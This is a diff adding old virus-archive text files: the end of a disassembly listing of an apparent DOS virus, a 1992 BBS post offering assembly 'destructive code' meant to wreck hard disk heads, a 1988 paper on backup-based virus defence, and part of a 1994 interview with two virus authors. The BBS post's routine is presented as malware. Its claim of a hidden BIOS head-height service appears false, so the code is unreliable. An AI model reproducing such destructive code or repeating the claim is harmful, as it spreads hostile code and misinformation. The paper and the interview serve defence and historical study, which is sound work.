+0000:061F  018E1EEB                  ADD     [BP+Y0EB1EH],CX
+0000:0623  048E                      ADD     AL,08EH
+0000:0625  1E                        PUSH    DS
+0000:0626  8E1EFFFF                  MOV     DS,[Y0FFFFH]
+0000:062A  FFFF                      ???     DI
+0000:062C  FFFF                      ???     DI
+0000:062E  FFFF                      ???     DI
+0000:0630  FFFF                      ???     DI
+0000:0632  FFFF                      ???     DI
+0000:0634  FFFF                      ???     DI
+0000:0636  FFFF                      ???     DI
+0000:0638  FFFF                      ???     DI
+0000:063A  FFFF                      ???     DI
+0000:063C  7C1F                      JL      X065D
+0000:063E  DE3E8D29                  ESC     037H,[Y0298DH]
+0000:0642  1400                      ADC     AL,00H
+0000:0644  1800                      SBB     [BX+SI],AL
+0000:0646  F1                        DB      0F1H
+0000:0647  1F                        POP     DS
+0000:0648  FFFF                      ???     DI
+0000:064A  FFFF                      ???     DI
+0000:064C  0000                      ADD     [BX+SI],AL
+0000:064E  0000                      ADD     [BX+SI],AL
+0000:0650  0000                      ADD     [BX+SI],AL
+0000:0652  0000                      ADD     [BX+SI],AL
+0000:0654  0000                      ADD     [BX+SI],AL
+0000:0656  0000                      ADD     [BX+SI],AL
+0000:0658  0000                      ADD     [BX+SI],AL
+0000:065A  0000                      ADD     [BX+SI],AL
+0000:065C  0000                      ADD     [BX+SI],AL
+0000:065E  0000                      ADD     [BX+SI],AL
+0000:0660  CD21                      INT     021H
+0000:0662  CB                        RET                       ; INTERSEGMENT
+0000:0663  0000              X0663:  ADD     [BX+SI],AL
+0000:0665  0000                      ADD     [BX+SI],AL
+0000:0667  0000                      ADD     [BX+SI],AL
+0000:0669  0000                      ADD     [BX+SI],AL
+0000:066B  0000                      ADD     [BX+SI],AL
+0000:066D  2020                      AND     [BX+SI],AH
+0000:066F  2020                      AND     [BX+SI],AH
+0000:0671  2020                      AND     [BX+SI],AH
+0000:0673  2020                      AND     [BX+SI],AH
+0000:0675  2020                      AND     [BX+SI],AH
+0000:0677  2000                      AND     [BX+SI],AL
+0000:0679  0000                      ADD     [BX+SI],AL
+0000:067B  0000                      ADD     [BX+SI],AL
+0000:067D  2020                      AND     [BX+SI],AH
+
+"JV.MOC"                                                              PAGE  0013
+
+0000:067F  2020                      AND     [BX+SI],AH
+0000:0681  2020                      AND     [BX+SI],AH
+0000:0683  2020                      AND     [BX+SI],AH
+0000:0685  2020                      AND     [BX+SI],AH
+0000:0687  2000                      AND     [BX+SI],AL
+0000:0689  0000                      ADD     [BX+SI],AL
+0000:068B  0000                      ADD     [BX+SI],AL
+0000:068D  0000                      ADD     [BX+SI],AL
+0000:068F  0000                      ADD     [BX+SI],AL
+0000:0691  0D6B6F                    OR      AX,06F6BH
+0000:0694  6465                      JZ      X06FB
+0000:0696  6572                      JNZ     X070A
+0000:0698  7A2E                      JPE     X06C8
+0000:069A  6578                      JNZ     X0714
+0000:069C  6520                      JNZ     X06BE
+0000:069E  613A                      JNO     X06DA
+0000:06A0  6B6F                      JPO     X0711
+0000:06A2  6465                      JZ      X0709
+0000:06A4  6572                      JNZ     X0718
+0000:06A6  2E6578                    JNZ     X0721
+0000:06A9  650D                      JNZ     X06B8
+0000:06AB  0000                      ADD     [BX+SI],AL
+0000:06AD  0000                      ADD     [BX+SI],AL
+0000:06AF  0000                      ADD     [BX+SI],AL
+0000:06B1  0000                      ADD     [BX+SI],AL
+0000:06B3  0000                      ADD     [BX+SI],AL
+0000:06B5  0000                      ADD     [BX+SI],AL
+0000:06B7  0000                      ADD     [BX+SI],AL
+0000:06B9  0000                      ADD     [BX+SI],AL
+0000:06BB  0000                      ADD     [BX+SI],AL
+0000:06BD  0000                      ADD     [BX+SI],AL
+0000:06BF  0000                      ADD     [BX+SI],AL
+0000:06C1  0000                      ADD     [BX+SI],AL
+0000:06C3  0000                      ADD     [BX+SI],AL
+0000:06C5  0000                      ADD     [BX+SI],AL
+0000:06C7  0000                      ADD     [BX+SI],AL
+0000:06C9  0000                      ADD     [BX+SI],AL
+0000:06CB  0000                      ADD     [BX+SI],AL
+0000:06CD  0000                      ADD     [BX+SI],AL
+0000:06CF  0000                      ADD     [BX+SI],AL
+0000:06D1  0000                      ADD     [BX+SI],AL
+0000:06D3  0000                      ADD     [BX+SI],AL
+0000:06D5  0000                      ADD     [BX+SI],AL
+0000:06D7  0000                      ADD     [BX+SI],AL
+0000:06D9  005718                    ADD     [BX+018H],DL
+0000:06DC  0825                      OR      [DI],AH
+0000:06DE  A5                        MOVSW   
+0000:06DF  FEC5                      INC     CH
+0000:06E1  07                        POP     ES
+0000:06E2  1E                        PUSH    DS
+0000:06E3  0210                      ADD     DL,[BX+SI]
+0000:06E5  07                        POP     ES
+0000:06E6  57                        PUSH    DI
+0000:06E7  18B10D47                  SBB     [BX+DI+Y0470DH],DH
+0000:06EB  0104                      ADD     [SI],AX
+0000:06ED  7F70                      JG      X075F
+
+"JV.MOC"                                                              PAGE  0014
+
+0000:06EF  0010                      ADD     [BX+SI],DL
+0000:06F1  07                        POP     ES
+0000:06F2  1D001C                    SBB     AX,01C00H
+0000:06F5  09A20D3D                  OR      [BP+SI+Y03D0DH],SP
+0000:06F9  0C1B                      OR      AL,01BH
+0000:06FB  02B10D02          X06FB:  ADD     DH,[BX+DI+Y020DH]
+0000:06FF  F24D                      REPNE  DEC     BP
+0000:0701  360E                      PUSH    CS
+0000:0703  0300                      ADD     AX,[BX+SI]
+0000:0705  0000                      ADD     [BX+SI],AL
+0000:0707  00EE                      ADD     DH,CH
+0000:0709  002A              X0709:  ADD     [BP+SI],CH
+0000:070B  0F                        POP     CS
+0000:070C  42                        INC     DX
+0000:070D  01C1                      ADD     CX,AX
+0000:070F  0DB44C                    OR      AX,04CB4H
+0000:0712  B000                      MOV     AL,00H
+0000:0714  CD21              X0714:  INT     021H
+0000:0716  4D                        DEC     BP
+0000:0717  7344                      JAE     X075D
+0000:0719  6F73                      JG      X078E
+
+
+
+
+     Another file downloaded from:                     NIRVANAnet(tm)
+
+     & the Temple of the Screaming Electron              415-935-5845
+     Just Say Yes                                        415-922-1613
+     Rat Head                                            415-524-3649
+     Cheez Whiz                                          408-363-9766
+     Reality Check                                       415-474-2602
+
+   Specializing in conversations, obscure information, high explosives,
+       arcane knowledge, political extremism, diversive sexuality,
+       insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
+
+  Full access for first-time callers.  We don't want to know who you are,
+   where you live, or what your phone number is. We are not Big Brother.
+
+                         "Raw Data for Raw Nerves"
+
+
diff --git a/textfiles.com/virus/killhead.vir b/textfiles.com/virus/killhead.vir
new file mode 100644
index 00000000..35bb20f9
--- /dev/null
+++ b/textfiles.com/virus/killhead.vir
@@ -0,0 +1,32 @@
+99/100: RE: ...
+Name: Spartacus #48 @892
+Date: Sunday, August 30, 1992   1:59 pm
+From: Night Light BBS [908-892-6723]
+
+Reply to: Soth Amon #1 @2017
+
+All right. Here it is (relevant destructive code only)...
+
+CHOP DB 127 255 254 252 245 230 210 180 150 120 90 60 30 0
+
+;Heights as in a common karate technique.
+
+...
+BREAKIT:     MOV SI,CHOP
+             MOV CX,000E    ;# of positions
+             MOV DX,0080    ;first fixed disk, head 0.
+             MOV AH,35      ;little known BIOS service that controls
+                            ;head height (int 13, serv 35).
+KILLIT:      LODSB
+             INT 13         ;call the service
+                            ;there is some inbuilt delay as the head moves
+             DEC CX
+             JNZ KILLIT
+...
+
+Note: This code WILL NOT break a Bernoulli Box cartridge, although it creates 
+many physical errors due to scratching and may destroy the head.
+
+
+
+ Sub: Virus Discussion
diff --git a/textfiles.com/virus/levine.pap b/textfiles.com/virus/levine.pap
new file mode 100644
index 00000000..57c0941e
--- /dev/null
+++ b/textfiles.com/virus/levine.pap
@@ -0,0 +1,240 @@
+Date:         Thu, 15 Sep 88 10:29:56 CDT
+From:         Len Levine <len@EVAX.MILW.WISC.EDU>
+Subject:      Popular Level Paper
+
+Not to be outdone by a couple of mere students, I am submitting my
+paper that was first entered here in rough form.  It was published
+this week in the UWM campus computing newsletter and is at a lower
+level than the Keil and Lee paper that I read here this week.  It
+serves a different audience.  Thanks to those of you who made
+suggestions, I took some of them.
+
+
+                         Potential Virus Attack
+                                   by
+                              L. P. Levine
+
+     There  has been talk recently about the presence of  virus  programs
+running on office computers.  There now are a significant number of  such
+machines on this campus.  If a virus does infect a significant number  of
+machines  here it is possible that many office IBM compatible (or  Macin-
+tosh)  machines  will fail or lose files on the same day.  It will  be  a
+very  unpleasant time and our  professional staff will be overwhelmed  by
+requests  for  help and will take some time (weeks) to get  the  recovery
+process  under  way.   Most of us are unaware of how  dependent  we  have
+become on these desktop machines and how much we will be affected by  the
+loss of data that may ensue.
+
+     Perhaps  we should define some terms here.  There are  two  computer
+program elements that need definition.
+
+     First  is  a Trojan Horse program.  This sort of program,  like  its
+historical  namesake, has two functions.  On the "outside" it does  some-
+thing to encourage the user to run it.  Typically, Trojan Horse  programs
+may be games, small support programs, such as directory listers, or even,
+in  one  case already on record, commercial software  packages.   On  the
+"inside"  however, the program does something unfriendly to the  computer
+on  which it runs.  Some Trojan Horse programs delete files,  some  reset
+clocks,  some mark disk areas as unusable and some change  the  operating
+system  of the computer.  The most destructive of them cause  other  pro-
+grams  to  change their nature, usually by adding instructions  to  those
+programs  that  make  them Trojan Horse programs as  well.   These  added
+instructions are often called computer viruses.
+
+     A computer virus is a portion of a program that does not run  alone,
+but  requires another program to support it.  In this sense it is like  a
+biological  virus,  requiring a cell for a host in order to allow  it  to
+work.   Since it does not run alone, it does not appear in any  directory
+and  is  never directly executed.  It moves from program  to  program  by
+making  each  program to which it is attached (infected so  to  speak)  a
+Trojan  Horse  program for further software infection.  A  virus  may  be
+programmed to appear to do nothing for a long time (remain dormant),  and
+then, when some trigger event occurs, do whatever it is programmed to do.
+The  movement of a virus program element from machine to  machine  occurs
+when a Trojan Horse program is run on that machine.
+
+     If  a  virus program element infects our office machines,  then  not
+only  will  the company's office machines be affected, but the  home  ma-
+chines  that many staff members now have will also have their  files  af-
+fected by the very same virus, and at the same time.  If you are  prepar-
+ing a paper for publication, writing or working on an exam, or  preparing
+some important correspondence, you may well find that your machine  read-
+able copies of that material will become unusable both at home and at the
+office.
+
+     This  paper  discusses some evasive action that you can  do  now  to
+prepare  for  the  return of your machine to working order.   What  I  am
+recommending  in  this paper is no more than good housekeeping and  is  a
+practice that each of us should do anyhow, with or without the threat  of
+some mysterious computer virus.
+
+     What I will discuss for the next few paragraphs applies to users who
+have  machines with either a floppy disk drive and a hard disk  drive  or
+have two floppy disk drives on their computers.
+
+     Step one:  Locate the original source disks for the operating system
+you  are  now using on your computer.  This may no longer be  the  system
+delivered  with your machine, you may well have had an upgrade.   DO  NOT
+PUT  THESE DISKS INTO YOUR FLOPPY DRIVE YET.  Secure a few  dozen  write-
+lock  tabs and put one on each of the delivery system disks.   (When  you
+hold  a disk upright the right side of the disk has a 1/4"  square  notch
+cut into the black paper jacket.  The write-lock tabs are black or alumi-
+num  colored gummed paper tags about 3/4" X 1/2" that can be  stuck  over
+the  edge  of the disk covering the front and back of this  notch.   When
+that tab is in place it is not possible for the computer to write  infor-
+mation onto a floppy disk.)
+
+     Only after you have write-locked these disks should you put the disk
+into the computer and compare the system on that disk with the system you
+are using.  STOP AND READ THE NEXT SENTENCE! The simple act of  executing
+the DIR command on an unlocked disk is enough to infect that disk with  a
+virus  if your system is already infected and if the disk is  not  write-
+locked.   I am not kidding.  There is a very small probability that  your
+system  is already infected.  I recommend that you compare the  date  and
+size  of the file COMMAND.COM on your original source disks and  on  your
+working  disk or disks to see that they are the same.  For my system  the
+results look like this:
+
+                 ------------------------------------
+                 C> dir a:\command.com
+
+                 Volume in drive A is MS330PP01
+                 Directory of  A:\
+
+                 COMMAND  COM  25276 7-24-87  12:00a
+                 1 File(s)      5120 bytes free
+
+                 C> dir c:\command.com
+
+                 Volume in drive C has no label
+                 Directory of  C:\
+
+                 COMMAND  COM  25276 7-24-87  12:00a
+                 1 File(s)   7391232 bytes free
+                 ------------------------------------
+
+     Note that both copies of COMMAND.COM have the same date and time  of
+creation (midnight on July 24th 1987) and both are the same size  (25,276
+bytes).  The numbers for your machine may well differ from mine, but both
+should be the same.  When those disks have been found, put them away in a
+safe  place.  I recommend that they be put in a plastic storage  box  not
+too near your computer.
+
+     Step  two:  There are a small number of software packages  that  you
+would  be  lost without.  In my case they include  WordStar,  dBase  III,
+PKARC,  Kermit, and Directory Scanner.  These packages may well  be  pur-
+chased  commercial  software  (WordStar, dBase  III),  shareware  (PKARC,
+Directory Scanner), and freeware (Kermit).  In each case you should  have
+an original source delivery disk for each of these packages.  Find  those
+disks,  WRITE LOCK THEM, compare them with the copies you are now  using,
+and  put  them in a safe place.  I recommend that they be  put  with  the
+system  disks  discussed above.  (It is probably true that  the  creation
+dates for the running copies of this sort of software will disagree  with
+the creation dates for the delivery disks.  Installation of many of these
+packages entails writing to the program.  That is not a problem.)
+
+     Step  three:  Using the backup procedure of your choice,  perform  a
+backup  of  the  system files on your computer.  If I was  using  a  dual
+floppy  based system, I would simply make copies of my working  WordStar,
+dBase III, PKARC, Kermit, and Directory Scanner disks.  If I was using  a
+computer  with a floppy and a hard disk, I would use  backup-restore,  or
+Fastback or some other package to back up the directories C:\WS,  C:\DB3,
+C:\ARK, C:\KERMIT and C:\DS.  (Of course these directories have different
+names  on your system.)  Write lock these backup disks.  Label them  with
+today's  date.  Using your backup system compare the disks you have  just
+backed up with the disks you are using to ensure that the backup  "took".
+Put  the  backup disks in a safe place.  This will tie up  half  a  dozen
+disks, but with disks now costing $0.35 each, you will probably find  the
+$2 investment worth while.
+
+     Step  four:   (This applies to those users who use hard disk based
+computers.)   Prepare  a backup procedure that  will  permit  incremental
+backups.   This will entail backing up the entire system once,  and  then
+periodically  backing  up those files that have changed since  the   last
+backup.
+
+     Perform  such  incremental backups regularly.   After  several  such
+incremental backups, the size of the backup set will become quite  large.
+At  that  time, put the backup set away in a safe place  and  begin  with
+another set of disks for a full system backup followed by several  incre-
+ments.   When  the second set is full, put them away and  return  to  the
+first  set.  This will afford a very secure set of backup files.  I  find
+that 50 disks makes a good backup set.  Thus 100 disks would be used  for
+the  double backup group.  I suspect that most users would need to  do  a
+full  backup  about 4 to 8 times per year, requiring about  1/2  hour  of
+manipulation  and  should do incremental backups about  twice  per  week,
+requiring less than 5 minutes.
+
+     (It is a very good idea to periodically test the backup system  with
+a verification of what you have backed up.  Most file backup systems have
+a Verify command to do this sort of test.)
+
+     Step five:  Go back to your useful work.
+
+     Recovery from the loss of one or a few files:
+
+     Sooner  or  later  you will lose some files.   They  will  disappear
+without apparent cause and you will blame the problem on a virus.  It  is
+my  experience that in cases like this no virus is involved, the loss  of
+files will be due to an operator error.  If you have been doing incremen-
+tal  backups, then the simplest corrective action is to use  the  recover
+feature  of the backup system that you are using and simply  restore  the
+latest  copy  of  the lost file(s) to the hard disk.  If  you  have  been
+conscientious in your backup practice, then the loss of work will  entail
+just a few minutes or, at most, a few hours of rework.
+
+     Recovery from the loss of the entire system:
+
+     It  may happen that the entire hard disk seems to be lost.  This  is
+serious  but, in most cases, is likely not the result of a  virus.   Most
+failures  of the hard disk are due to hardware problems.  The best  solu-
+tion is to repair the hardware if the technical people judge that that is
+the  problem,  and then, after reformatting the hard  disk,  restore  the
+system from your latest backup.  Almost without fail, this will result in
+a complete return to a normal system.
+
+     Really bad news, the restore does not work:
+
+     This may well be the point of this memo.  If a virus has been plant-
+ed  in  your system and has been set to trigger on some event,  then  the
+only way to recover is to rebuild the system from scratch using the write
+locked set of disks that I advised you to prepare above.  If these  disks
+are not write locked, and if you mount them onto an infected system, then
+the disks will be infected in turn and you may well be unable to  restore
+>From  a clean, uninfected source without returning to the  system  vendor
+for a fresh copy of each of your executable programs.  On the  assumption
+that you first build your system again from scratch, you may restore  all
+of  the data files from your backup set.  (A data file is one  that  does
+not  have the extension .com, .exe, or .sys.)  Any other file should  not
+be able to carry a virus either between systems or over the backup  proc-
+ess.
+
+     Some facts:
+
+     There is no reason ever to boot the system from a foreign disk whose
+history you are not prepared to trust.  (For example, booting from a copy
+protected  version of Lotus 1-2-3 is as secure as the  Lotus  corporation
+can make it.)
+
+     There  is  no reason why a disk used to transport data  between  ma-
+chines  should  have a copy of the files  io.sys,  msdos.sys,  ibmio.sys,
+ibmdos.sys or command.com on it.
+
+     No  system to date has been infected by the transport to it of  data
+files.  Only executable files (including device drivers and the operating
+system itself) can be used as Trojan Horse programs.
+
+                                                        Leonard P. Levine
+                                                                Professor
+                                           Department of Computer Science
+                               College of Engineering and Applied Science
+                                        University of Wisconsin-Milwaukee
+                                               Milwaukee, Wisconsin 53201
+
+                                                           (414) 229-5170
+                                                           (414) 962-4719
+
+
+
+
+
diff --git a/textfiles.com/virus/lminterv.iew b/textfiles.com/virus/lminterv.iew
new file mode 100644
index 00000000..528df979
--- /dev/null
+++ b/textfiles.com/virus/lminterv.iew
@@ -0,0 +1,1080 @@
+Faces Behind the Masks
+ by Sara Gordon
+
+- this interview was featured in "Secure Computing" magazine in August 
+through November 1994
+
+===============================================================================
+
+(the following is the text which appeared before the interview - this was 
+*not* written by Ms. Gordon)
+
+"Who are they?  Why are they doing it?  Virus authors have been seen as 
+paranoid, secretive, anti-social but are they?  In this article two 
+legendary virus authors give their reasons for doing what they did."
+
+"One of the perennial questions is why do they do it?  Often asked at 
+conferences and seminars, ordinary folk want to know why virus authors 
+write viruses.  The desire to understand - as some sort of process to 
+build effective defences against viruses - is very strong.  This month 
+sees the start of a series in which Sara Gordon interviews two legendary 
+figures in the virus community.
+
+One of the difficulties in understanding viruses, virus authors and the 
+virus community is the inherent secrecy and paranoia of its population.  
+However, the anti-virus community does communicate although it is always 
+via e:mail on the Internet - never directly.
+
+As with the interview with the Dark Avenger printed in Virus News 
+International last year, Sara Gordon has taken considerable care to 
+establish that the respondents are genuine.  Sara Gordon is herself a 
+professional in the area of Cyberspace - a collective term for all 
+on-line systems.
+
+Pseudonyms taken by virus authors are meant to conceal their true 
+identity.  They are also a means of donning another character - typical 
+of the sort of thing done by fantasy-games players (although this is not 
+to suggest that such games players are involved in nefarious 
+activities).  Names like Dark Avenger, Hellraiser, Black Baron and 
+Lucifer Messiah give a certain presence to what are just ordinary folk.
+
+Current research indicates that most virus authors are adolescent 
+males.  As with other habitues of on-line systems many live out an 
+existence which is alotgether more exciting - swashbuckling, even - than 
+their more humdrum lives in real life.
+
+Another aspect of interviewing members of this community is that the 
+communication is always written.  Some of the respondents' writing 
+skills (and this is not meant to be a derogatory) are not that high and 
+so they tend to come across less well than they would, for example, in a 
+telephone interview.  To some extent the on-line community has tried to 
+short-cut some of the deficiencies of the medium by introducing symbols 
+which indicate the tone of the written comment.  These are called 
+emoticons of which the sideways smiley :) is the most common.
+
+Virus writing is widely regarded as an anti-social, and in some quarters 
+illegal, activity.  We take a neutral position for the purpose of this 
+series of interviews.  While it may be more comfortable to adopt the 
+moral high-ground, it does not actually contribute to the solution."
+
+==============================================================================
+
+Lucifer Messiah: the name is chilling, but the man behind the mask is 
+one of the most decent people I have ever spoken to.  Hellraiser: more 
+demonic images of youth gone mad?  He too has proven to be a bright and 
+charming young man.
+
+These two have more in common than their satanically-inspired aliases.  
+Both are members of virus writing groups; both have written and 
+allegedly distributed computer viruses.  There is, however, one 
+difference.  Lucifer Messiah writes viruses and is now affiliated with 
+PCScav, a computer 'research' group based in Canada.  Hellraiser, a 
+member of the Phalcon/Skism virus writing group, says he has stopped 
+writing viruses.
+
+My introduction to Lucifer Messiah, who also uses the alias Chris Boyd, 
+came about this year.  I have known Hellraiser for approximately two 
+years.  They have had similar experiences, but have taken radically 
+different paths.  Why is one still writing viruses, while the other has 
+left it all behind?  I decided the best way to find out was to ask 
+them.  Here are some insights into the minds of these two individuals.
+
+Q: People are always curious as to why a virus writer writes viruses.  I 
+have found there are no 'simple answers', but if you had to give one 
+'reason' what would it be?
+
+Lucifer: The intrigue of coming up with new technologies.  I enjoy 
+making the computer do what it isn't supposed to be able to do.
+
+Hellraiser: All throughout my life I have been involved with the 
+negative side of my pastimes.  For instance, when I was younger I was an 
+heavily into art, but instead of doing my work on a canvas with oils - I 
+did it on a wall with spray paint.
+
+Naturally when it came to computers I once again found myself on the 
+'dark side'.  Instead of writing utility programs and such, I started 
+writing viruses.  Instead of calling BBS systems I started hacking into 
+computer systems.  It is best wrapped up by saying - I find it much 
+easier to accomplish negative actions, than positive - thus my drive for 
+writing viruses.
+
+Q: At what age did you become involved with computers (not viruses). Can 
+you describe your initial experiences with computers?  How were you 
+taught; by yourself, or by an instructor, parent or friend?
+
+Lucifer: 14 years old.  I got a Vic 20 at the Yule.  They boot up in 
+Basic, so I learned from that.  The magazines were very helpful.  I got 
+some Tandy I think not too long after that.  I took Computer through 
+high school as well.
+
+Hellraiser: I would have to say around the age of 13 or 14.  That 
+Christmas, I got my first home computer, an Atari XE with 8Kb of RAM!
+After begging my parents for two weeks I got a storage device for it (a 
+data cassette drive) to save all of my Basic programs.  There wasn't 
+much to do on the system, being as how I had no software - much less a 
+modem.  So I typed in hundreds of lines of Basic code (10 lines of Basic 
+code, hundreds of data statements) from magazines like Compute.
+
+I started to learn Basic myself off these examples, and in no time I was 
+good enough to scare the hell out of my neighbors' little brother with 
+an incredible War-Games simulation (the fact there was a thunderstorm 
+that day that really added to the effect).  All the great XE action 
+ended abruptly when I smashed the damn thing in a fit of anger after I 
+couldn't load the Space Invaders game [I] blew eight dollars on.
+
+After the XE days my only contact with computers was at school.  I 
+worked with such relics as the TRS-80, Apple IIE, and the original IBM 
+PC in high school (I am hinting [at] my age).  About all I did was 
+program little junk programs in Basic, and mess around the machine 
+code.  Nothing spectacular.
+
+It was a few years later that I was able to use a computer again, when 
+my father brought home a new 286 clone.  To top it off, the thing had a 
+1200 bps modem.  From then on I have become a true computer hacker (in 
+the good and bad sense of the word).
+
+Q: What different operating systems did you learn, and in what order did 
+you learn them?
+
+Lucifer: I started with Basic.  The Vic 20 doesn't really have an 
+operating system.  After that, whatever the name of the Tandy operating 
+system was.  There no such thing as DOS yet.  Maybe it was a hybrid 
+CP/M.  In school, it was AT&T UNIX all along.  I never used DOS until 3 
+years ago.  I don't really like it.
+
+Hellraiser: I have to say that DOS was the first full O/S that I 
+learned, which I taught myself.  Later on I picked up UNIX by hacking 
+into systems and just playing around.  I played with VMS for a small 
+amount of time but found it very boring.  And lately I have been 
+learning the new GUIs - OS/2 and Windows/NT.  All of which I taught 
+myself.
+
+Q: What different languages did you learn, and in what order did you 
+learn them?
+
+Lucifer: I started programming in FORTRAN.  I hated it.  I hate math!  
+Then Pascal and C came along, and I was in heaven.  When I learned about 
+assembly, I stopped programming in Pascal altogether, and only sometimes 
+in C.  I also use APL, the different varieties of AWK, ummm, Lisp, a 
+little COBOL.  I'm not showing off.  This is what we had to learn in 
+school.
+
+Hellraiser: As I mentioned above - Basic was my first language.  Much 
+later on (when I got a PC) I picked up Pascal and started writing cool 
+little utilities and BBS doors.  When the whole virus thing came into 
+play, I knew I had to learn ASM, and fast.  So that was the next step.  
+After I stopped coding viruses, I picked up C.  At this time I am 
+learning C++.
+
+Q: What is the highest level of education you have completed?
+
+Lucifer: 3 years of college.
+
+Hellraiser: I left college after two years for financial reasons.
+
+Q: Do you plan to go further in school? If you do, why?  If not, why not?
+
+Lucifer: No.  I'm 27 years old!  I may take the odd night [school] 
+course.  I've been enjoying the presentations put on by Intel, and that 
+sort of thing.  I guess that's an education.
+
+Hellraiser: If I could, I would at the drop of a dime.  The problem is I 
+don't have the money for it.  Plus I have a life and responsibilities.  
+Right now and I would find it very hard to drop them all to go back to 
+school.  Let's just say the only way I might get back into school is if 
+I come into a lot of money real quick.
+
+Q: What person, non virus writer (non computer related), do you have 
+the most respect for.
+
+Lucifer: My mother, I guess.  She's really cool.
+
+Hellraiser: I would have to say, my mother.  She has been though a lot 
+of strife over the years, a large portion of which is my fault.  Yet she 
+still stays happy and positive.  I could never be that way.
+
+Q: What person, non virus writer (non computer related), do you have the 
+most disrespect for?
+
+Lucifer: Bob Rae/Kim Cambell/Brian Mulroney.  They are all actually 
+incarnates of each other.  They are a 'collective', each branching from 
+past lives as hedgehogs with brains the size of peas.
+
+Hellraiser: I can't pick just one person so I have to say politicians, 
+because they get away with so much stuff; stuff that would have me or 
+you in jail for life.  When they get caught all they get is a slap on 
+the wrist.  If I bounced hundreds of checks where would I be right now?
+
+Q: Now, what person computer related (non virus writer) do you have most 
+respect for?
+
+Lucifer: You.  Just kidding.  Do I get more brownie points?
+
+I used to respect Peter Norton because he had the coolest software, but 
+he has been really slipping.  His latest books leave much to hope.  I 
+really respect Bill Gates.  I don't necessarily like his DOS, but I sure 
+like what he has with it!  $$$$$$
+
+Hellraiser: That's a tough one.  The problem is I can not think of 
+anybody computer related I have a tremendous amount of respect for.  
+Don't get me wrong I have respect for a lot of people in the field, but 
+I can't pinpoint anyone in general.
+
+Q: What person, computer related, but still non-virus writer, do you 
+have most disrespect for?
+
+Lucifer:  Ross Greenberg.  Where does he get his facts from?  He is so 
+full of it!
+
+Hellraiser: I would have to say Bill Gates.  I know he has accomplished 
+a lot for himself, and he is a person that should be admired, but I just 
+do not trust him.  I don't like the way he makes billions off 
+poorly-made products that sell just because of the name Microsoft.  It's 
+like the emperor's new clothes, and Bill is very naked.
+
+Q: What virus writer do you have the most respect for?
+
+Lucifer: None, really.  I don't like to lick boots.  I find Dark 
+Avenger's ideas to be grand, but his programming is sloppy.  Perhaps the 
+guys from Trident.  Their Cruncher viruses were much smaller than Cohen 
+ever imagined.
+
+Hellraiser: No doubt, Dark Angel.  Not only is he a good friend, but 
+he's is a very smart person.  What really makes me respect him is his 
+willingness to teach.  That aspect is very rare for a virus writer.
+
+Q:  What virus writer do you have most disrepect for?
+
+Lucifer:  All of NuKE.
+
+Hellraiser: Rock Steady.  This guy knows about as much as I did two 
+years ago and he never stops bragging about how great he is.  He's sort 
+of the 'Bill Gates' of the virus world.  He controls lame people with 
+hype for lame product.  I hate this guy.
+
+Q:  Can you describe for me your initial (first) experience with a virus 
+writing group.  This does not have to be the first group you joined or 
+created or worked with or for.  I mean, the first time you ever heard of 
+a group, please tell me your impressions as you remember them.  Please 
+be as specific as possible.
+
+Lucifer: I played around with a Scandanavian hacking group.  I don't 
+want to get into details about that scene.  They aren't just a hacking 
+group, as you know.  You probably heard what they did at NASA three 
+years ago.
+
+A guy I went to school with in Sweden showed me computer virus.  It was 
+the Stoned.  The whole concept of it blew me away.  My second contact 
+was with the Ontario virus.  I wrote a new version of it.  You already 
+know that story.
+
+I was hacking on the telephone way before I ever learned about viruses.  
+I don't do that anymore, though.  It's too scary.
+
+Hellraiser: It had to be long before I actually knew anything about the 
+computer underground.  I was writing (hacking) viruses on my own at the 
+time.  Then one day I was on a BBS, Patti Hoffman's VSUM.  Wow!  A 
+listing of all known viruses.
+
+The thing that really got me was the name Rabid kept showing up.  Being 
+at the time I couldn't tell a good virus from a bad one, I thought these 
+guys [were] awesome.  That is what got me into the group thing.  It 
+wasn't until much later that I figured out that they were a bunch of 
+lamers.
+
+==============================================================================
+
+"How did it all start?  Whose idea was it initially?  What is the 
+philosophy of the group?  In this second article the two legendary virus 
+authors, in their indepth interview with Sara Gordon, throw further 
+light on their reasons for doing what they do - or did."
+
+"One of the perennial questions asked of virus writers is why do they do 
+it?  The interview recorded below tries to get under the skin of two 
+notable figures from the virus community.
+
+A serious difficulty when it comes to understanding viruses, virus 
+authors and the virus community is the inherent secrecy and paranoia of 
+its population.  However, the anti-virus community does communicate 
+although invariable via e:mail on the Internet.  Sara Gordon has 
+conducted a series of on-line interview with two self-confessed virus 
+authors, Lucifer Messiah and Hellraiser."
+
+==============================================================================
+
+Q: If you are part of a group now [which you are, I think :)], please 
+tell me as completely as possible how you got involved with the group.  
+Such as, met via modem, met in person, went to school with, etc..
+
+Lucifer: At the start, there was no group.  It was just a bunch of guys 
+who liked to hang around.  We usually were in some kind of trouble or 
+another.
+
+Did you ever see the movie Clockwork Orange?  We wanted to be like 
+droogies.  We got into telephone hacking.  The group actually formed 
+around that.  We all had computers.  Remember this was in school, too.  
+Really, i didn't my own computer at first with them.  Me and another guy 
+split costs because we lived near each other.  Soon we had names.
+
+All my friends always called me Lucifer Messiah.  I am a religious type 
+of person.  People were always afraid of me because I always wear black, 
+and have very long hair.  This was not normal then, with leather and 
+studs.  They called me Lucifer first.  When they found that I was not a 
+Satanist, they called me Jesus.  I had a sweater with a hood, so I used 
+to act like it.  Some people called it my satanic robe, and others my 
+Jesus clothes.  Now it is Lucifer Messiah.
+
+Blodigt Kors got his name because that was his rock band name.  It means 
+bloody cross.  He was (the) Satanist not me!  There is another guy 
+called Jackal.  He helped out with forming a group.  We were looking for 
+chaos.  Chaos was hacking, phreaking and viruses when they came.
+
+Three years ago I moved to Canada because of my job.  I work with 
+networks.  I kept the group going.  I met SCEB, who is Supreme Commander 
+Electro-Brainwave.  He's a weird kind of guy who everybody thought was a 
+copy.  He looked like a lawyer, and enjoyed changing his accent to a new 
+one every day.
+
+He is a phreaking big time.  The two of us put ANARKICK SYSTEMS 
+together.  We stayed close with the group in Sweden.  There were about 
+ten of us here, and 15 over there.  the viruses that SCEB and I write 
+never had names in them until the Ontario thing happened.  Now we put AS 
+on everything.
+
+Last year the group in Sweden got busted really bad.  ANARKICK SYSTEMS 
+is now just a fragment, and we just get together now and again to talk 
+about new technologies, and show off our new codes and ideas that we 
+create.  Most of what we do is not released, and that is probably good.
+
+Hellraiser: Well, here is the whole story.  When I was going to college 
+I met up with a few people who were interested in computers.  None of 
+which knew anything about the underground, myself included.  We would 
+sit in the computer lab and do stupid things like hacking into the 
+Novell network and read people's papers.  We added a menu system to the 
